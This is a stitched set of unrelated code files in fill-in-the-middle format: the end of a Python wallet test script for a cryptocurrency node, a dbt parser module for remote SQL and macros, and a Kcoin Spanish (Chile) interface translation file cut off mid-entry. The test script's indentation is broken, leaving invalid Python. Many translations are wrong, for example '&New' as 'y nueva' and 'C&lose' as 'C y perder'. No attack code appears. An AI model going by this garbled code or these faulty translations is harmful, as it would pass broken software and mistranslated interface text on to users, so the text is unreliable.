    except AssertionError as e:
        print("Assertion failed: "+e.message)
    except JSONRPCException as e:
        print("JSONRPC error: "+e.error['message'])
        traceback.print_tb(sys.exc_info()[2])
    except Exception as e:
        print("Unexpected exception caught during testing: "+str(sys.exc_info()[0]))
        traceback.print_tb(sys.exc_info()[2])
    # Tear down nodes and remove the datadir unless --nocleanup was given.
    if not options.nocleanup:
        print("Cleaning up")
        stop_nodes(nodes)
        wait_litecoinzds()
        shutil.rmtree(options.tmpdir)
    if success:
        print("Tests successful")
        sys.exit(0)
    else:
        print("Failed")
        sys.exit(1)
nodes[0].walletpassphrase('test', 12000)
nodes[0].keypoolrefill(3)
nodes[0].walletlock()
# drain them by mining
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
try:
nodes[0].generate(1)
raise AssertionError('Keypool should be exhausted after three addresses')
except JSONRPCException,e:
assert(e.error['code']==-12)
if __name__ == '__main__':
main()<|fim▁end|> | addr = set()
addr.add(nodes[0].getrawchangeaddress()) |
<|file_name|>sql.py<|end_file_name|><|fim▁begin|>import os
from dataclasses import dataclass
from typing import Iterable
from dbt.contracts.graph.manifest import SourceFile
from dbt.contracts.graph.parsed import ParsedSqlNode, ParsedMacro
from dbt.contracts.graph.unparsed import UnparsedMacro
from dbt.exceptions import InternalException
from dbt.node_types import NodeType
from dbt.parser.base import SimpleSQLParser
from dbt.parser.macros import MacroParser
from dbt.parser.search import FileBlock
@dataclass
class SqlBlock(FileBlock):
    """A FileBlock for ad-hoc/remote SQL, named explicitly by the caller
    rather than derived from a file path.

    (Rewritten to strip stray generated-token residue from the class body.)
    """
    block_name: str

    @property
    def name(self):
        return self.block_name
class SqlBlockParser(SimpleSQLParser[ParsedSqlNode]):
    """Parser for ad-hoc SQL operations (e.g. statements sent remotely)."""

    def parse_from_dict(self, dct, validate=True) -> ParsedSqlNode:
        """Deserialize a parsed-node dict, optionally validating it first."""
        if validate:
            ParsedSqlNode.validate(dct)
        return ParsedSqlNode.from_dict(dct)

    @property
    def resource_type(self) -> NodeType:
        return NodeType.SqlOperation

    @staticmethod
    def get_compiled_path(block: FileBlock):
        """Compiled output path under 'sql/' for an SQL block.

        Raises InternalException if handed a plain FileBlock instead of a
        SqlBlock (the narrowing also satisfies the type checker).
        """
        # we do it this way to make mypy happy
        if not isinstance(block, SqlBlock):
            raise InternalException(
                'While parsing SQL operation, got an actual file block instead of '
                'an SQL block: {}'.format(block)
            )

        return os.path.join('sql', block.name)

    def parse_remote(self, sql: str, name: str) -> ParsedSqlNode:
        """Wrap a raw SQL string from a remote caller and parse it."""
        source_file = SourceFile.remote(sql, self.project.project_name)
        contents = SqlBlock(block_name=name, file=source_file)
        return self.parse_node(contents)
class SqlMacroParser(MacroParser):
    """Macro parser that accepts macro source text from a remote caller."""

    def parse_remote(self, contents) -> Iterable[ParsedMacro]:
        """Yield every macro defined in `contents` (raw macro SQL text).

        A synthetic UnparsedMacro is built with placeholder paths since the
        source did not come from a file on disk.
        """
        base = UnparsedMacro(
            path='from remote system',
            original_file_path='from remote system',
            package_name=self.project.project_name,
            raw_sql=contents,
            root_path=self.project.project_root,
            resource_type=NodeType.Macro,
        )
        for node in self.parse_unparsed_macros(base):
            yield node
<|file_name|>kcoin_es_CL.ts<|end_file_name|><|fim▁begin|><TS language="es_CL" version="2.1">
<context>
<name>AddressBookPage</name>
<message>
<source>Right-click to edit address or label</source>
<translation>Haga clic para editar la dirección o etiqueta</translation>
</message>
<message>
<source>Create a new address</source>
        <translation>Crea una nueva dirección</translation>
</message>
<message>
<source>&New</source>
<translation>y nueva</translation>
</message>
<message>
<source>Copy the currently selected address to the system clipboard</source>
<translation>Copia la dirección seleccionada al portapapeles</translation>
</message>
<message>
<source>&Copy</source>
<translation>y copiar</translation>
</message>
<message>
<source>C&lose</source>
<translation>C y perder</translation>
</message>
<message>
<source>&Copy Address</source>
<translation>&Copia dirección</translation>
</message>
<message>
<source>Delete the currently selected address from the list</source>
<translation>Eliminar la dirección seleccionada de la lista</translation>
</message>
<message>
<source>Export the data in the current tab to a file</source>
<translation>Exportar los datos de la pestaña actual a un archivo</translation>
</message>
<message>
<source>&Export</source>
<translation>y exportar</translation>
</message>
<message>
<source>&Delete</source>
<translation>&Borrar</translation>
</message>
<message>
<source>Copy &Label</source>
<translation>Copia &etiqueta</translation>
</message>
<message>
<source>&Edit</source>
<translation>&Editar</translation>
</message>
<message>
<source>Comma separated file (*.csv)</source>
<translation>Archivos separados por coma (*.csv)</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<source>Enter passphrase</source>
<translation>Introduce contraseña actual </translation>
</message>
<message>
<source>New passphrase</source>
<translation>Nueva contraseña</translation>
</message>
<message>
<source>Repeat new passphrase</source>
<translation>Repite nueva contraseña</translation>
</message>
<message>
<source>Encrypt wallet</source>
<translation>Codificar billetera</translation>
</message>
<message>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>Esta operación necesita la contraseña para desbloquear la billetera.</translation>
</message>
<message>
<source>Unlock wallet</source>
<translation>Desbloquea billetera</translation>
</message>
<message>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>Esta operación necesita la contraseña para decodificar la billetara.</translation>
</message>
<message>
<source>Decrypt wallet</source>
<translation>Decodificar cartera</translation>
</message>
<message>
<source>Change passphrase</source>
<translation>Cambia contraseña</translation>
</message>
<message>
<source>Confirm wallet encryption</source>
<translation>Confirma la codificación de cartera</translation>
</message>
<message>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR KCOINS</b>!</source>
<translation>Atención: ¡Si codificas tu billetera y pierdes la contraseña perderás <b>TODOS TUS KCOINS</b>!</translation>
</message>
<message>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>¿Seguro que quieres seguir codificando la billetera?</translation>
</message>
<message>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>IMPORTANTE: Cualquier versión anterior que hayas realizado de tu archivo de billetera será reemplazada por el nuevo archivo de billetera encriptado. Por razones de seguridad, los respaldos anteriores de los archivos de billetera se volverán inútiles en tanto comiences a usar la nueva billetera encriptada.</translation>
</message>
<message>
<source>Warning: The Caps Lock key is on!</source>
        <translation>Precaución: Mayúsculas activadas</translation>
</message>
<message>
<source>Wallet encrypted</source>
<translation>Billetera codificada</translation>
</message>
<message>
<source>Wallet encryption failed</source>
<translation>Falló la codificación de la billetera</translation>
</message>
<message>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>La codificación de la billetera falló debido a un error interno. Tu billetera no ha sido codificada.</translation>
</message>
<message>
<source>The supplied passphrases do not match.</source>
<translation>Las contraseñas no coinciden.</translation>
</message>
<message>
<source>Wallet unlock failed</source>
<translation>Ha fallado el desbloqueo de la billetera</translation>
</message>
<message>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>La contraseña introducida para decodificar la billetera es incorrecta.</translation>
</message>
<message>
<source>Wallet decryption failed</source>
<translation>Ha fallado la decodificación de la billetera</translation>
</message>
<message>
<source>Wallet passphrase was successfully changed.</source>
<translation>La contraseña de billetera ha sido cambiada con éxito.</translation>
</message>
</context>
<context>
<name>KcoinGUI</name>
<message>
<source>Sign &message...</source>
<translation>Firmar &Mensaje...</translation>
</message>
<message>
<source>Synchronizing with network...</source>
<translation>Sincronizando con la red...</translation>
</message>
<message>
<source>&Overview</source>
<translation>&Vista general</translation>
</message>
<message>
<source>Show general overview of wallet</source>
<translation>Muestra una vista general de la billetera</translation>
</message>
<message>
<source>&Transactions</source>
<translation>&Transacciones</translation>
</message>
<message>
<source>Browse transaction history</source>
<translation>Explora el historial de transacciónes</translation>
</message>
<message>
<source>E&xit</source>
<translation>&Salir</translation>
</message>
<message>
<source>Quit application</source>
<translation>Salir del programa</translation>
</message>
<message>
<source>About &Qt</source>
<translation>Acerca de</translation>
</message>
<message>
<source>Show information about Qt</source>
<translation>Mostrar Información sobre QT</translation>
</message>
<message>
<source>&Options...</source>
<translation>&Opciones</translation>
</message>
<message>
<source>&Encrypt Wallet...</source>
<translation>&Codificar la billetera...</translation>
</message>
<message>
<source>&Backup Wallet...</source>
<translation>&Respaldar billetera...</translation>
</message>
<message>
<source>&Change Passphrase...</source>
<translation>&Cambiar la contraseña...</translation>
</message>
<message>
<source>Open &URI...</source>
<translation>Abrir y url...</translation>
</message>
<message>
<source>Kcoin Core client</source>
<translation>cliente kcoin core</translation>
</message>
<message>
<source>Reindexing blocks on disk...</source>
<translation>Cargando el index de bloques...</translation>
</message>
<message>
<source>Send coins to a Kcoin address</source>
<translation>Enviar monedas a una dirección kcoin</translation>
</message>
<message>
<source>Backup wallet to another location</source>
<translation>Respaldar billetera en otra ubicación</translation>
</message>
<message>
<source>Change the passphrase used for wallet encryption</source>
<translation>Cambiar la contraseña utilizada para la codificación de la billetera</translation>
</message>
<message>
<source>&Debug window</source>
<translation>Ventana &Debug</translation>
</message>
<message>
<source>Open debugging and diagnostic console</source>
<translation>Abre consola de depuración y diagnóstico</translation>
</message>
<message>
<source>Kcoin</source>
<translation>Kcoin</translation>
</message>
<message>
<source>Wallet</source>
<translation>Cartera</translation>
</message>
<message>
<source>&Send</source>
<translation>&Envía</translation>
</message>
<message>
<source>&Receive</source>
<translation>y recibir</translation>
</message>
<message>
<source>&Show / Hide</source>
<translation>&Mostrar/Ocultar</translation>
</message>
<message>
<source>Sign messages with your Kcoin addresses to prove you own them</source>
<translation>Firmar un mensaje para provar que usted es dueño de esta dirección</translation>
</message>
<message>
<source>&File</source>
<translation>&Archivo</translation>
</message>
<message>
<source>&Settings</source>
<translation>&Configuración</translation>
</message>
<message>
<source>&Help</source>
<translation>&Ayuda</translation>
</message>
<message>
<source>Tabs toolbar</source>
<translation>Barra de pestañas</translation>
</message>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
<message>
<source>Warning</source>
<translation>Atención</translation>
</message>
<message>
<source>Information</source>
<translation>Información</translation>
</message>
<message>
<source>Up to date</source>
<translation>Actualizado</translation>
</message>
<message>
<source>Catching up...</source>
<translation>Recuperando...</translation>
</message>
<message>
<source>Sent transaction</source>
<translation>Transacción enviada</translation>
</message>
<message>
<source>Incoming transaction</source>
<translation>Transacción entrante</translation>
</message>
<message>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>La billetera esta <b>codificada</b> y actualmente <b>desbloqueda</b></translation>
</message>
<message>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>La billetera esta <b>codificada</b> y actualmente <b>bloqueda</b></translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<source>Network Alert</source>
<translation>Alerta de Red</translation>
</message>
</context>
<context>
<name>CoinControlDialog</name>
<message>
<source>Amount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Confirmed</source>
<translation>Confirmado</translation>
</message>
<message>
<source>Priority</source>
<translation>prioridad</translation>
</message>
<message>
<source>Copy address</source>
<translation>Copia dirección</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>medium</source>
<translation>medio</translation>
</message>
<message>
<source>yes</source>
<translation>si</translation>
</message>
<message>
<source>no</source>
<translation>no</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<source>Edit Address</source>
<translation>Editar dirección</translation>
</message>
<message>
<source>&Label</source>
<translation>&Etiqueta</translation>
</message>
<message>
<source>&Address</source>
<translation>&Dirección</translation>
</message>
<message>
<source>New receiving address</source>
<translation>Nueva dirección para recibir</translation>
</message>
<message>
<source>New sending address</source>
<translation>Nueva dirección para enviar</translation>
</message>
<message>
<source>Edit receiving address</source>
<translation>Editar dirección de recepción</translation>
</message>
<message>
<source>Edit sending address</source>
<translation>Editar dirección de envio</translation>
</message>
<message>
<source>The entered address "%1" is already in the address book.</source>
<translation>La dirección introducida "%1" ya esta guardada en la libreta de direcciones.</translation>
</message>
<message>
<source>The entered address "%1" is not a valid Kcoin address.</source>
<translation>La dirección introducida "%1" no es una dirección Kcoin valida.</translation>
</message>
<message>
<source>Could not unlock wallet.</source>
<translation>No se pudo desbloquear la billetera.</translation>
</message>
<message>
<source>New key generation failed.</source>
<translation>La generación de nueva clave falló.</translation>
</message>
</context>
<context>
<name>FreespaceChecker</name>
<message>
<source>name</source>
<translation>Nombre</translation>
</message>
</context>
<context>
<name>HelpMessageDialog</name>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>version</source>
<translation>versión</translation>
</message>
<message>
<source>Usage:</source>
<translation>Uso:</translation>
</message>
</context>
<context>
<name>Intro</name>
<message>
<source>Welcome</source>
<translation>bienvenido</translation>
</message>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
</context>
<context>
<name>OpenURIDialog</name>
<message>
<source>URI:</source>
<translation>url:</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<source>Options</source>
<translation>Opciones</translation>
</message>
<message>
<source>&Main</source>
<translation>&Principal</translation>
</message>
<message>
<source>Reset all client options to default.</source>
<translation>Reestablece todas las opciones.</translation>
</message>
<message>
<source>&Network</source>
<translation>&Red</translation>
</message>
<message>
<source>Expert</source>
<translation>experto</translation>
</message>
<message>
<source>Automatically open the Kcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source>
<translation>Abre automáticamente el puerto del cliente Kcoin en el router. Esto funciona solo cuando tu router es compatible con UPnP y está habilitado.</translation>
</message>
<message>
<source>Map port using &UPnP</source>
<translation>Direcciona el puerto usando &UPnP</translation>
</message>
<message>
<source>Proxy &IP:</source>
<translation>&IP Proxy:</translation>
</message>
<message>
<source>&Port:</source>
<translation>&Puerto:</translation>
</message>
<message>
<source>Port of the proxy (e.g. 9050)</source>
<translation>Puerto del servidor proxy (ej. 9050)</translation>
</message>
<message>
<source>&Window</source>
<translation>y windows
</translation>
</message>
<message>
<source>Show only a tray icon after minimizing the window.</source>
<translation>Muestra solo un ícono en la bandeja después de minimizar la ventana</translation>
</message>
<message>
<source>&Minimize to the tray instead of the taskbar</source>
<translation>&Minimiza a la bandeja en vez de la barra de tareas</translation>
</message>
<message>
<source>M&inimize on close</source>
<translation>M&inimiza a la bandeja al cerrar</translation>
</message>
<message>
<source>&Display</source>
<translation>&Mostrado</translation>
</message>
<message>
<source>&Unit to show amounts in:</source>
<translation>&Unidad en la que mostrar cantitades:</translation>
</message>
<message>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
        <translation>Elige la subdivisión por defecto para mostrar cantidades en la interfaz cuando se envíen monedas</translation>
</message>
<message>
<source>&OK</source>
<translation>&OK</translation>
</message>
<message>
<source>&Cancel</source>
<translation>&Cancela</translation>
</message>
<message>
<source>default</source>
<translation>predeterminado</translation>
</message>
<message>
<source>Confirm options reset</source>
<translation>Confirmar reestablecimiento de las opciones</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<source>Form</source>
<translation>Formulario</translation>
</message>
<message>
<source>Total:</source>
<translation>Total:</translation>
</message>
</context>
<context>
<name>PaymentServer</name>
<message>
<source>Payment acknowledged</source>
<translation>Pago completado</translation>
</message>
</context>
<context>
<name>PeerTableModel</name><|fim▁hole|> <name>QObject</name>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>N/A</source>
<translation>N/A</translation>
</message>
</context>
<context>
<name>QRImageWidget</name>
<message>
<source>&Save Image...</source>
<translation>Guardar imagen...</translation>
</message>
<message>
<source>&Copy Image</source>
<translation>Copiar Imagen</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<source>Client name</source>
<translation>Nombre del cliente</translation>
</message>
<message>
<source>N/A</source>
<translation>N/A</translation>
</message>
<message>
<source>Client version</source>
<translation>Versión del Cliente</translation>
</message>
<message>
<source>&Information</source>
<translation>&Información</translation>
</message>
<message>
<source>General</source>
<translation>General</translation>
</message>
<message>
<source>Startup time</source>
<translation>Tiempo de inicio</translation>
</message>
<message>
<source>Network</source>
<translation>Red</translation>
</message>
<message>
<source>Name</source>
<translation>Nombre</translation>
</message>
<message>
<source>Number of connections</source>
<translation>Número de conexiones</translation>
</message>
<message>
<source>Block chain</source>
<translation>Bloquea cadena</translation>
</message>
<message>
<source>Version</source>
<translation>version
</translation>
</message>
<message>
<source>&Open</source>
<translation>&Abrir</translation>
</message>
<message>
<source>&Console</source>
<translation>&Consola</translation>
</message>
<message>
<source>Totals</source>
<translation>Total:</translation>
</message>
<message>
<source>Clear console</source>
<translation>Limpiar Consola</translation>
</message>
</context>
<context>
<name>ReceiveCoinsDialog</name>
<message>
<source>&Label:</source>
<translation>&Etiqueta:</translation>
</message>
<message>
<source>&Message:</source>
<translation>&mensaje</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
</context>
<context>
<name>ReceiveRequestDialog</name>
<message>
<source>QR Code</source>
<translation>Código QR </translation>
</message>
<message>
<source>Copy &Address</source>
<translation>&Copia dirección</translation>
</message>
<message>
<source>&Save Image...</source>
<translation>Guardar imagen...</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
</context>
<context>
<name>RecentRequestsTableModel</name>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<source>Send Coins</source>
<translation>Enviar monedas</translation>
</message>
<message>
<source>Amount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Send to multiple recipients at once</source>
<translation>Enviar a múltiples destinatarios</translation>
</message>
<message>
<source>Add &Recipient</source>
<translation>&Agrega destinatario</translation>
</message>
<message>
<source>Clear &All</source>
<translation>&Borra todos</translation>
</message>
<message>
<source>Balance:</source>
<translation>Balance:</translation>
</message>
<message>
<source>Confirm the send action</source>
<translation>Confirma el envio</translation>
</message>
<message>
<source>S&end</source>
<translation>&Envía</translation>
</message>
<message>
<source>Confirm send coins</source>
<translation>Confirmar el envio de monedas</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>The amount to pay must be larger than 0.</source>
        <translation>La cantidad por pagar tiene que ser mayor que 0.</translation>
</message>
<message>
<source>The amount exceeds your balance.</source>
<translation>La cantidad sobrepasa tu saldo.</translation>
</message>
<message>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>El total sobrepasa tu saldo cuando se incluyen %1 como tasa de envio.</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<source>A&mount:</source>
<translation>Cantidad:</translation>
</message>
<message>
<source>Pay &To:</source>
<translation>&Pagar a:</translation>
</message>
<message>
<source>Enter a label for this address to add it to your address book</source>
<translation>Introduce una etiqueta a esta dirección para añadirla a tu guia</translation>
</message>
<message>
<source>&Label:</source>
<translation>&Etiqueta:</translation>
</message>
<message>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<source>Paste address from clipboard</source>
<translation>Pega dirección desde portapapeles</translation>
</message>
<message>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<source>Message:</source>
<translation>Mensaje:</translation>
</message>
</context>
<context>
<name>ShutdownWindow</name>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<source>&Sign Message</source>
<translation>&Firmar Mensaje</translation>
</message>
<message>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<source>Paste address from clipboard</source>
<translation>Pega dirección desde portapapeles</translation>
</message>
<message>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<source>Enter the message you want to sign here</source>
<translation>Escriba el mensaje que desea firmar</translation>
</message>
<message>
<source>Signature</source>
<translation>Firma</translation>
</message>
<message>
<source>Sign the message to prove you own this Kcoin address</source>
        <translation>Firmar un mensaje para probar que usted es dueño de esta dirección</translation>
</message>
<message>
<source>Sign &Message</source>
<translation>Firmar Mensaje</translation>
</message>
<message>
<source>Clear &All</source>
<translation>&Borra todos</translation>
</message>
<message>
<source>&Verify Message</source>
        <translation>&Verificar mensaje</translation>
</message>
<message>
<source>Verify &Message</source>
        <translation>Verificar &mensaje</translation>
</message>
<message>
<source>Click "Sign Message" to generate signature</source>
<translation>Click en "Firmar Mensage" para conseguir firma</translation>
</message>
<message>
<source>Please check the address and try again.</source>
        <translation>Por favor, revise la dirección Kcoin e inténtelo de nuevo</translation>
</message>
<message>
<source>Wallet unlock was cancelled.</source>
        <translation>Se canceló el desbloqueo de la billetera</translation>
</message>
<message>
<source>Message signing failed.</source>
<translation>Firma fallida</translation>
</message>
<message>
<source>Message signed.</source>
<translation>Mensaje firmado</translation>
</message>
<message>
<source>Message verified.</source>
<translation>Mensaje comprobado</translation>
</message>
</context>
<context>
<name>SplashScreen</name>
<message>
<source>Kcoin Core</source>
<translation>kcoin core</translation>
</message>
<message>
<source>[testnet]</source>
<translation>[red-de-pruebas]</translation>
</message>
</context>
<context>
<name>TrafficGraphWidget</name>
<message>
<source>KB/s</source>
<translation>KB/s</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<source>Open until %1</source>
<translation>Abierto hasta %1</translation>
</message>
<message>
<source>%1/offline</source>
<translation>%1/fuera de linea</translation>
</message>
<message>
<source>%1/unconfirmed</source>
<translation>%1/no confirmado</translation>
</message>
<message>
<source>%1 confirmations</source>
<translation>%1 confirmaciónes</translation>
</message>
<message>
<source>Status</source>
<translation>Estado</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Generated</source>
<translation>Generado</translation>
</message>
<message>
<source>From</source>
<translation>De</translation>
</message>
<message>
<source>To</source>
<translation>A</translation>
</message>
<message>
<source>own address</source>
<translation>propia dirección</translation>
</message>
<message>
<source>label</source>
<translation>etiqueta</translation>
</message>
<message>
<source>Credit</source>
<translation>Credito</translation>
</message>
<message>
<source>not accepted</source>
<translation>no aceptada</translation>
</message>
<message>
<source>Debit</source>
<translation>Debito</translation>
</message>
<message>
<source>Transaction fee</source>
<translation>Comisión transacción</translation>
</message>
<message>
<source>Net amount</source>
<translation>Cantidad total</translation>
</message>
<message>
<source>Message</source>
<translation>Mensaje</translation>
</message>
<message>
<source>Comment</source>
<translation>Comentario</translation>
</message>
<message>
<source>Transaction ID</source>
<translation>ID de Transacción</translation>
</message>
<message>
<source>Transaction</source>
<translation>Transacción</translation>
</message>
<message>
<source>Amount</source>
<translation>Cantidad</translation>
</message>
<message>
<source>, has not been successfully broadcast yet</source>
<translation>, no ha sido emitido satisfactoriamente todavía</translation>
</message>
<message>
<source>unknown</source>
<translation>desconocido</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<source>Transaction details</source>
<translation>Detalles de transacción</translation>
</message>
<message>
<source>This pane shows a detailed description of the transaction</source>
<translation>Esta ventana muestra información detallada sobre la transacción</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Type</source>
<translation>Tipo</translation>
</message>
<message>
<source>Open until %1</source>
<translation>Abierto hasta %1</translation>
</message>
<message>
<source>Confirmed (%1 confirmations)</source>
<translation>Confirmado (%1 confirmaciones)</translation>
</message>
<message>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>Este bloque no ha sido recibido por otros nodos y probablemente no sea aceptado !</translation>
</message>
<message>
<source>Generated but not accepted</source>
        <translation>Generado pero no aceptado</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Received with</source>
<translation>Recibido con</translation>
</message>
<message>
<source>Received from</source>
<translation>Recibido de</translation>
</message>
<message>
<source>Sent to</source>
<translation>Enviado a</translation>
</message>
<message>
<source>Payment to yourself</source>
<translation>Pagar a usted mismo</translation>
</message>
<message>
<source>Mined</source>
<translation>Minado</translation>
</message>
<message>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>Estado de transacción. Pasa el raton sobre este campo para ver el numero de confirmaciónes.</translation>
</message>
<message>
<source>Date and time that the transaction was received.</source>
<translation>Fecha y hora cuando se recibió la transaccion</translation>
</message>
<message>
<source>Type of transaction.</source>
<translation>Tipo de transacción.</translation>
</message>
<message>
<source>Amount removed from or added to balance.</source>
<translation>Cantidad restada o añadida al balance</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<source>All</source>
<translation>Todo</translation>
</message>
<message>
<source>Today</source>
<translation>Hoy</translation>
</message>
<message>
<source>This week</source>
<translation>Esta semana</translation>
</message>
<message>
<source>This month</source>
        <translation>Este mes</translation>
</message>
<message>
<source>Last month</source>
<translation>Mes pasado</translation>
</message>
<message>
<source>This year</source>
<translation>Este año</translation>
</message>
<message>
<source>Range...</source>
<translation>Rango...</translation>
</message>
<message>
<source>Received with</source>
<translation>Recibido con</translation>
</message>
<message>
<source>Sent to</source>
<translation>Enviado a</translation>
</message>
<message>
<source>To yourself</source>
<translation>A ti mismo</translation>
</message>
<message>
<source>Mined</source>
<translation>Minado</translation>
</message>
<message>
<source>Other</source>
<translation>Otra</translation>
</message>
<message>
<source>Enter address or label to search</source>
<translation>Introduce una dirección o etiqueta para buscar</translation>
</message>
<message>
<source>Min amount</source>
<translation>Cantidad minima</translation>
</message>
<message>
<source>Copy address</source>
<translation>Copia dirección</translation>
</message>
<message>
<source>Copy label</source>
<translation>Copia etiqueta</translation>
</message>
<message>
<source>Copy amount</source>
<translation>Copiar Cantidad</translation>
</message>
<message>
<source>Edit label</source>
<translation>Edita etiqueta</translation>
</message>
<message>
<source>Show transaction details</source>
<translation>Mostrar detalles de la transacción</translation>
</message>
<message>
<source>Comma separated file (*.csv)</source>
<translation>Archivos separados por coma (*.csv)</translation>
</message>
<message>
<source>Confirmed</source>
<translation>Confirmado</translation>
</message>
<message>
<source>Date</source>
<translation>Fecha</translation>
</message>
<message>
<source>Type</source>
<translation>Tipo</translation>
</message>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>ID</source>
<translation>ID</translation>
</message>
<message>
<source>Range:</source>
<translation>Rango:</translation>
</message>
<message>
<source>to</source>
        <translation>hasta</translation>
</message>
</context>
<context>
<name>UnitDisplayStatusBarControl</name>
</context>
<context>
<name>WalletFrame</name>
</context>
<context>
<name>WalletModel</name>
<message>
<source>Send Coins</source>
<translation>Enviar monedas</translation>
</message>
</context>
<context>
<name>WalletView</name>
<message>
<source>&Export</source>
        <translation>&Exportar</translation>
</message>
<message>
<source>Export the data in the current tab to a file</source>
<translation>Exportar los datos de la pestaña actual a un archivo</translation>
</message>
<message>
<source>Backup Wallet</source>
<translation>Respaldar billetera</translation>
</message>
<message>
<source>Wallet Data (*.dat)</source>
<translation>Datos de billetera (*.dat)</translation>
</message>
<message>
<source>Backup Failed</source>
<translation>Ha fallado el respaldo</translation>
</message>
</context>
<context>
<name>kcoin-core</name>
<message>
<source>Options:</source>
<translation>Opciones:
</translation>
</message>
<message>
<source>Specify data directory</source>
<translation>Especifica directorio para los datos
</translation>
</message>
<message>
<source>Accept command line and JSON-RPC commands</source>
<translation>Aceptar comandos consola y JSON-RPC
</translation>
</message>
<message>
<source>Run in the background as a daemon and accept commands</source>
<translation>Correr como demonio y acepta comandos
</translation>
</message>
<message>
<source>Use the test network</source>
<translation>Usa la red de pruebas
</translation>
</message>
<message>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>Precaución: -paytxfee es muy alta. Esta es la comisión que pagarás si envias una transacción.</translation>
</message>
<message>
<source>Connect only to the specified node(s)</source>
<translation>Conecta solo al nodo especificado
</translation>
</message>
<message>
<source>Error loading block database</source>
<translation>Error cargando blkindex.dat</translation>
</message>
<message>
<source>Error: Disk space is low!</source>
<translation>Atención: Poco espacio en el disco duro</translation>
</message>
<message>
<source>Imports blocks from external blk000??.dat file</source>
<translation>Importar bloques desde el archivo externo blk000??.dat </translation>
</message>
<message>
<source>Information</source>
<translation>Información</translation>
</message>
<message>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>Enviar informacion de seguimiento a la consola en vez del archivo debug.log</translation>
</message>
<message>
<source>Start minimized</source>
<translation>Arranca minimizado
</translation>
</message>
<message>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>Intenta usar UPnP para mapear el puerto de escucha (default: 1 when listening)</translation>
</message>
<message>
